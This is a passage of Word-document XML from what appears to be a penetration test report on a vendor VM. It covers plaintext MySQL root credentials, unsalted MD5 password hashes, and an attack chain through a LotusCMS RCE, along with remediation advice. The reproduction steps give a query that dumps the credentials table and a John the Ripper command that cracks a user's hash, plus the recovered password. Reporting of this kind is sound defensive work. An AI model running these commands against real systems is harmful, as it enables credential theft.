        <w:t>$ mysql -u root -p&lt;password&gt; gallery -e "SHOW TABLES;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BDD11D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc229906594"/>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="340C14CF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160A23A4" wp14:editId="1E0617E8">
            <wp:extent cx="5334000" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1118512421" name="Picture 111851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62325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8729C8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Figure 4.4: gconfig.php contains the MySQL root credentials in plain text; using them, the gallery.dev_accounts table is read with unsalted MD5 password hashes for application users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325ABCAB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc229906595"/>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="5E04ABE2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Require the vendor to refactor credential storage before VM acceptance. Acceptable options: (a) read MySQL credentials from environment variables injected by systemd or the container runtime; (b) read them from a file outside the web document root (for example, /etc/cassandra-pay/gallery.env, owner root:www-data, mode 0640); (c) use a secret manager such as HashiCorp Vault or AWS Secrets Manager with a short-lived token. The MySQL account used by the web application must not be the database root account; a per-application principal scoped to the gallery database only is required. Reference: OWASP Application Security Verification Standard v4.0, Section V6.4 (Secret Management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442ED0B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc229906596"/>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="468CA712" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CWE-798 Use of Hard-Coded Credentials; CWE-256 Plaintext Storage of a Password; MITRE ATT&amp;CK T1552.001 Unsecured Credentials: Credentials In Files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF242EB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc229906597"/>
      <w:r>
        <w:t>Finding F5: Vendor application stores user passwords using unsalted MD5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="14FE01FF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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600"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2826"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="6859D881" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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6F9F5832" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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4F0757B8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>CVSS v3.1 base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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67BD1AB6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Vector string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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5CB6B565" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Affected asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="09DE623C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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4D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59D3AD85" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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FF4D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28B4AD4C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF4D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3668F841" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF4D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74089F91" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01 (10.42.8.22), MySQL table gallery.dev_accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="336B4222" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4DDE1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity justification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVSS 5.9 Medium. The vulnerability requires prior reach to the password database (high attack complexity), but once reached, the password recovery time is sub-second per hash on commodity hardware. We rate the finding Medium and not Low because the hashing choice is below the floor of any current password-storage standard (NIST SP 800-63B Rev. 3; OWASP Password Storage Cheat Sheet 2024) and is itself a compliance concern for PCI-DSS Requirement 8.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550DE2C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A682B3A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc229906598"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="394F49D4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User passwords in the dev_accounts table are stored as raw MD5 digests, without a per-user salt and without any iteration/key-stretching component. The MD5 algorithm was published in 1992 and has been considered unsuitable for password storage since the early 2010s for two independent reasons: (a) extreme computation speed (a single commodity CPU computes ~24 million MD5 hashes per second; modern GPUs reach the order of 100 billion per second), and (b) ubiquitous availability of pre-computed rainbow tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D02A3A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For the loneferret account, the stored hash recovered to the plain-text password "starwars" in under one second using John the Ripper against the rockyou.txt wordlist. This is the same wordlist that is included by default in every penetration testing distribution; the result is reproducible on any modern laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0AF3E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The finding is independent of finding F4: even with credentials properly externalised, a future SQL injection or backup leak would still expose the password hashes, and those hashes would still be trivially crackable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F8B88" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc229906599"/>
      <w:r>
        <w:t>Steps to reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="5518A81D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># (from the database session obtained via F4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF633DB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>SELECT id, username, password FROM dev_accounts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593031CC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># Hash of interest copied into a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F345C3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ echo "&lt;md5-hash&gt;" &gt; loneferret.md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C81DD6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt loneferret.md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732D65F8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># → 1g 0:00:00:00 DONE (...)   password recovered: "starwars"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FADC305" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc229906600"/>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="381F6E42" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ACFE423" wp14:editId="44701025">
            <wp:extent cx="5334000" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2082611848" name="Picture 208261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62325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5B2D8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Figure 4.5: John the Ripper recovers the loneferret password from its MD5 hash in under one second; bench-mark on the same CPU shows 24.4 million MD5 hashes per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293ACC48" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc229906601"/>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4FBBA864" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Require the vendor to migrate the password storage column to Argon2id with the OWASP-recommended parameters (m=64 MiB, t=3, p=2) before VM acceptance. A migration strategy that re-hashes on next successful login is acceptable; a one-time bulk rehash of cracked passwords is also acceptable for accounts whose plain-texts are recovered as part of the migration. Long-term, set Argon2id-default in the application framework and remove the MD5 path entirely. Reference: OWASP Password Storage Cheat Sheet 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37F40B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc229906602"/>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="169A4388" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CWE-916 Use of Password Hash With Insufficient Computational Effort; CWE-759 Use of a One-Way Hash without a Salt; OWASP Password Storage Cheat Sheet 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D83B6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc229906603"/>
      <w:r>
        <w:t>4.2  Attack Chain — How findings combine in practice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="0252A5A7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The findings above are not an unordered list of independent defects. Three of them — F2, F4, F5 — compose into a single end-to-end attack against vendor-eval-01 that an external attacker can execute without any prior foothold. Two of them — F1 and F3 — describe alternative paths from a low-privilege foothold on cassandra-stg-01 to a full administrative shell. The chain matters for two operational reasons: it shows the client where to break the chain with one well-placed control (any of the recommendations below short-circuits the entire sequence), and it demonstrates that the findings reinforce one another rather than compete for attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9A48D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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900"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="4426"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="4C14390A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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021A8780" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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4ECCEE8C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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26E861C8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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3BFBF5DF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>What the attacker gains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="274A06D3"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EDD03FB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>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FEE9BBC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01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FD9562F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F2 (LotusCMS RCE)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FCC2F94" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Network → www-data shell (no credentials required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6F656B33"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DF4A01F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
